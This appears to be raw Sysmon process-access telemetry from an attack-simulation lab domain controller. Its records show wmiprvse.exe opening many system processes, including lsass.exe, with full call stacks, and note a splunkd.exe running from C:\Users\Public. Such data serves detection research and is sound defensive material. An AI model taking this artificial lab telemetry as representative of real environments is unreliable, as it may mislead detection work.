15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025093Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025092Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025091Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025090Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025089Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025088Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025087Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025086Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025085Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025084Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025083Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025082Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025081Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025080Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025079Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025078Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025077Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025076Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.960{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025075Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:28.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535F-6008-5506-00000000A301}3288C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025074Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 